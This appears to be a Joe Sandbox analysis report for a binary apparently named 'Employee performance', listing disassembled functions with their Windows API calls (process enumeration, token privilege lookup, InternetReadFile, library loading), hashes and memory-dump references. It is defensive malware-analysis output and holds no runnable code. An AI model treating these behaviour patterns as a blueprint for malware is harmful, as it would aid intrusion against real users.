Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: acce1fc6e2324259d5ff2f10a8dc0313d06b344930df1749a4f1ee6ec9b9fd36
Instruction ID: 488f249df222336859af4fc3e7b5b159fbedbb7d53cecebe895b75f8d27f6243
Opcode Fuzzy Hash: acce1fc6e2324259d5ff2f10a8dc0313d06b344930df1749a4f1ee6ec9b9fd36
Instruction Fuzzy Hash: 94313E75D00249AFD700EFA9C8818EEBBFDFF88204B5480AAE455E7311E7359E45CBA0

Function 0103D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0103D501
Process32FirstW.KERNEL32(00000000,?), ref: 0103D50F
Process32NextW.KERNEL32(00000000,?), ref: 0103D52F
CloseHandle.KERNEL32(00000000), ref: 0103D5DC

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: ab0de264ba8d5d53d97509758cb480727708b478deb11c9698da120cd8be99a0
Instruction ID: 26d21dbefa4ae0453d9c3e51e5c1f5d91ed36d47a9d6bef5be5f0d102190383a
Opcode Fuzzy Hash: ab0de264ba8d5d53d97509758cb480727708b478deb11c9698da120cd8be99a0
Instruction Fuzzy Hash: 8031AF711083009FD301EF94CC81AAFBBE9EFD9344F44092EF5C1862A1EB759A48DB92

Function 01068FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FE9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FE9BB2

GetCursorPos.USER32(?), ref: 01069001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,01027711,?,?,?,?,?), ref: 01069016
GetCursorPos.USER32(?), ref: 0106905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,01027711,?,?,?), ref: 01069094

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 42a975d3fc39406ffa6f96ecf704eca8e7d81700c059f823d67988ecb9033212
Instruction ID: 1dd98e5451fa0d60c4693b410fad92e71ae3c59eca9131f89d279a66482eacb8
Opcode Fuzzy Hash: 42a975d3fc39406ffa6f96ecf704eca8e7d81700c059f823d67988ecb9033212
Instruction Fuzzy Hash: D521BF35601018FFEF258F98C848EFA3FF9EB89350F004099FA8547261C3369990DB60

Function 0103D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0106CB68), ref: 0103D2FB
GetLastError.KERNEL32 ref: 0103D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 0103D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0106CB68), ref: 0103D376

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: fc3842c407c58d6382caafa14ec9b325fff81840d0faf01edec9943a8db1b455
Instruction ID: ed6111901316be25e84a1e00bf8fc7adf8e584495e540565fa6f89ae344476e9
Opcode Fuzzy Hash: fc3842c407c58d6382caafa14ec9b325fff81840d0faf01edec9943a8db1b455
Instruction Fuzzy Hash: FF21E2705083019F9310DFA8C98086E7BECEE86324F948A5EF4D9C72A1D735DE09CB92

Function 01031571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 01031014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0103102A
Part of subcall function 01031014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 01031036
Part of subcall function 01031014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01031045
Part of subcall function 01031014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0103104C
Part of subcall function 01031014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01031062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 010315BE
_memcmp.LIBVCRUNTIME ref: 010315E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01031617
HeapFree.KERNEL32(00000000), ref: 0103161E

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 4eba2cb71552c9f9f650033a5a172887f87730b2b119a1af4991f6dffefe7376
Instruction ID: 89dc790d7e67506cb17119217a11e5adecf2851ea69194f8be6e9d481713de0a
Opcode Fuzzy Hash: 4eba2cb71552c9f9f650033a5a172887f87730b2b119a1af4991f6dffefe7376
Instruction Fuzzy Hash: C1219031E00109EFEB10DFA9C944BEEBBF8EF88354F084499E581AB240D735AA05DB60

Function 01062782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0106280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 01062824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 01062832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 01062840

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: fdb18b7d0e1f4ab59d0cd83062345b46ffa3ffc1d4849f72743d08dcdd863825
Instruction ID: 1193ca5c2cdab0838c5092488acfeb9d05eb89f46ef1dfcc0e6f16faa9af26d1
Opcode Fuzzy Hash: fdb18b7d0e1f4ab59d0cd83062345b46ffa3ffc1d4849f72743d08dcdd863825
Instruction Fuzzy Hash: 1421C131205112AFE7149B24CC44FAA7B99AF45324F198159F4A68B6E2C77AEC82C7D0

Function 0104CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0104CE89
GetLastError.KERNEL32(?,00000000), ref: 0104CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 0104CEFE

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: fd44a7e00618637097048eda477c1bbad86685d0d455814f4d282df8e4b092ca
Instruction ID: 16a41945809d4938086c1d1d1ac369cccf750c1ac0f601e6c72c4a91894021c4
Opcode Fuzzy Hash: fd44a7e00618637097048eda477c1bbad86685d0d455814f4d282df8e4b092ca
Instruction Fuzzy Hash: E92190B15013059BF770DF6ACA84BAA7BF8EF40354F10446EE6C6D2162E779EA049B50

Function 010378F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 01038D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0103790A,?,000000FF,?,01038754,00000000,?,0000001C,?,?), ref: 01038D8C
Part of subcall function 01038D7D: lstrcpyW.KERNEL32(00000000,?), ref: 01038DB2
Part of subcall function 01038D7D: lstrcmpiW.KERNEL32(00000000,?,0103790A,?,000000FF,?,01038754,00000000,?,0000001C,?,?), ref: 01038DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,01038754,00000000,?,0000001C,?,?,00000000), ref: 01037923
lstrcpyW.KERNEL32(00000000,?), ref: 01037949
lstrcmpiW.KERNEL32(00000002,cdecl,?,01038754,00000000,?,0000001C,?,?,00000000), ref: 01037984

Strings

cdecl, xrefs: 0103797B

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 8d8f01c98636d4b336f0d0eb85150090edad0892ba7420b7e05d1046e36f00ad
Instruction ID: b64251baa8cbc953f2537af8ab19cae0a1aae5017949b02b18376790c1d4e656
Opcode Fuzzy Hash: 8d8f01c98636d4b336f0d0eb85150090edad0892ba7420b7e05d1046e36f00ad
Instruction Fuzzy Hash: BC11067A200342ABDB256F39C844E7A77E9FF85350B00816BF982CB264EB369801C751

Function 01067CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 01067D0B
SetWindowLongW.USER32(00000000,000000F0,?), ref: 01067D2A
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 01067D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0104B7AD,00000000), ref: 01067D6B

Part of subcall function 00FE9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FE9BB2

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: c112b62e5f9227084c56163900a14b92934b53da485f43edfa33750358b3753d
Instruction ID: 1de9685bb4d26cc3a26201b68881aaca2df2a56f6d0d569f24bc0245873d59d0
Opcode Fuzzy Hash: c112b62e5f9227084c56163900a14b92934b53da485f43edfa33750358b3753d
Instruction Fuzzy Hash: 2611E432200615AFDB60AF2CCC04A6A3BE8BB45374F114B64F9B5C72F4E7358950CB50

Function 01065660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 010656BB
_wcslen.LIBCMT ref: 010656CD
_wcslen.LIBCMT ref: 010656D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 01065816

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: b9474b84c0fdfc845bac379499baf98fbdcc81807b5c1106b71c4b1ad2affdd0
Instruction ID: 81b9f5e5a1661ed79f61b48ae0d3b35ae9ad5e16fad4ebe49523f0b81fc2d517
Opcode Fuzzy Hash: b9474b84c0fdfc845bac379499baf98fbdcc81807b5c1106b71c4b1ad2affdd0
Instruction Fuzzy Hash: 3111D67160020996EB209F65DC85AFF7BACEF057A4F0040AAFAD5D6081EBB4D540CB60

Function 01001D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f89185474f3086a878e75ea0f0ce38aee6217e372b1017e026fa939d9cf0649
Instruction ID: 53de52e6dffcd1c4aba9f59f10037b52bdaf852298f2acacadbd3dfedd877f99
Opcode Fuzzy Hash: 1f89185474f3086a878e75ea0f0ce38aee6217e372b1017e026fa939d9cf0649
Instruction Fuzzy Hash: 6701A2B220961A7EF66335B86CC0F6B665DDF513B8F300326F6A1A11D5EB71CC004270

Function 01031A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 01031A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 01031A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 01031A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 01031A8A

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: b66ecb809a49d730073bf9905cbe8179fbfbf87ffb72a5647985ec5c1690e940
Instruction ID: 77b93934eb42ab904acefdf3372fcd4391b2bd615e296b67771a3e29cde89083
Opcode Fuzzy Hash: b66ecb809a49d730073bf9905cbe8179fbfbf87ffb72a5647985ec5c1690e940
Instruction Fuzzy Hash: DD11093AD00219FFEB11DBA9C985FADBBB8EB48750F200091EA44B7290D7716E51DB94

Function 0103E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0103E1FD
MessageBoxW.USER32(?,?,?,?), ref: 0103E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0103E246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0103E24D

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 7e5325b9fbe69f89d403eb7642ea0b9aa544189a7903912d90d99b0c39eee3dd
Instruction ID: 19b47b52b44b8211515cd464d98accccaf27ef626461038d2571f84c99324e93
Opcode Fuzzy Hash: 7e5325b9fbe69f89d403eb7642ea0b9aa544189a7903912d90d99b0c39eee3dd
Instruction Fuzzy Hash: FC11DB76904258BFD7219FACDC05A9E7FADAF85310F048355F994D3284D6B9D90487A0

Function 00FFD1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,00FFCFF9,00000000,00000004,00000000), ref: 00FFD218
GetLastError.KERNEL32 ref: 00FFD224
__dosmaperr.LIBCMT ref: 00FFD22B
ResumeThread.KERNEL32(00000000), ref: 00FFD249

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: c77671f7113293bcd8688f532970268a9d4716f4c407e6348f3c586e7f0036ac
Instruction ID: bf9b8ba75b8777e86f28b51c35c22dd8de2ef1e07a177f322ad23c976c06f397
Opcode Fuzzy Hash: c77671f7113293bcd8688f532970268a9d4716f4c407e6348f3c586e7f0036ac
Instruction Fuzzy Hash: 6901D63680511CBBEB215BA5DC09BBE7A6ADF82331F100259FA25961F0DB75C901E7E0

Function 00FD600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00FD604C
GetStockObject.GDI32(00000011), ref: 00FD6060
SendMessageW.USER32(00000000,00000030,00000000), ref: 00FD606A

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 75c3d9ac082bcae54f8f41cd129e2cf69092170c40a390e5c7315318c6d93504
Instruction ID: b3d8886e4b6f6c94510251931b1641330a7238188c1c3cd0e3351fe2cfaf3ad6
Opcode Fuzzy Hash: 75c3d9ac082bcae54f8f41cd129e2cf69092170c40a390e5c7315318c6d93504
Instruction Fuzzy Hash: BB116172501549BFEF225F949C48EEA7B6AFF0D364F040116FA5492114D73ADC60EB90

Function 00FF3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00FF3B56

Part of subcall function 00FF3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00FF3AD2
Part of subcall function 00FF3AA3: ___AdjustPointer.LIBCMT ref: 00FF3AED

_UnwindNestedFrames.LIBCMT ref: 00FF3B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00FF3B7C
CallCatchBlock.LIBVCRUNTIME ref: 00FF3BA4

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 0d96a72a7dcc28a065c97870d4f4ba8c11b08f982fb95cdba298975abdb9078c
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: FC01173250014DBBDF125E95CC42EFB3B69EF88764F044055FF48A6131C636E961EBA0

Function 01003073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00FD13C6,00000000,00000000,?,0100301A,00FD13C6,00000000,00000000,00000000,?,0100328B,00000006,FlsSetValue), ref: 010030A5
GetLastError.KERNEL32(?,0100301A,00FD13C6,00000000,00000000,00000000,?,0100328B,00000006,FlsSetValue,01072290,FlsSetValue,00000000,00000364,?,01002E46), ref: 010030B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0100301A,00FD13C6,00000000,00000000,00000000,?,0100328B,00000006,FlsSetValue,01072290,FlsSetValue,00000000), ref: 010030BF

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: c63e4ab38c603906820a7dadf402c86f31ed26f631e3efb6350bb96b336cf20b
Instruction ID: 006eec8d165318ed07fb8b1b83da27efe7b5b1ac9a145788b4a3bff4253d2497
Opcode Fuzzy Hash: c63e4ab38c603906820a7dadf402c86f31ed26f631e3efb6350bb96b336cf20b
Instruction Fuzzy Hash: CC01D432712222AFFB338ABD9C54A577B98BF05A61F104620F9C9EB1C1D726D401C7E0

Function 01037464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0103747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 01037497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 010374AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 010374CA

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
